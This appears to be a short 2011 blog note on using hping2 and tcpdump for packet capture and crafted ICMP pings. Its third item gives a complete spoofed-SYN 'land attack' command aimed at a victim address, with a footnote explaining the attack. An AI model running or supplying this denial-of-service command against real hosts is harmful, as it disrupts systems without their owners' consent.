Thursday, July 7, 2011

hping2 and tcpdump

Common use cases:

1) configuring tcpdump to display all packets with your machine's IP address and the IP address of the target machine, in either direction

# tcpdump -nn host <my_machine_ip> and host <target_machine_ip>

2) Pinging with choosen payload

$ hping2 --icmp --data 40 --file <file_with_payload> <dest_addr>

# tcpdump -nnX icmp    # shows us only icmp traffic in hex and ASCII formats without any names

3) Lunching "land attack"*

$ hping2 --count 1 --baseport 80 --destport 80 --syn --spoof <victim_addr> <victim_addr>

# tcpdump -nn tcp and host <victim_addr>

* land attack is an attack in which SYN packet with src IP addr equal to dest IP addr and src port equal to dst port is sent to the victim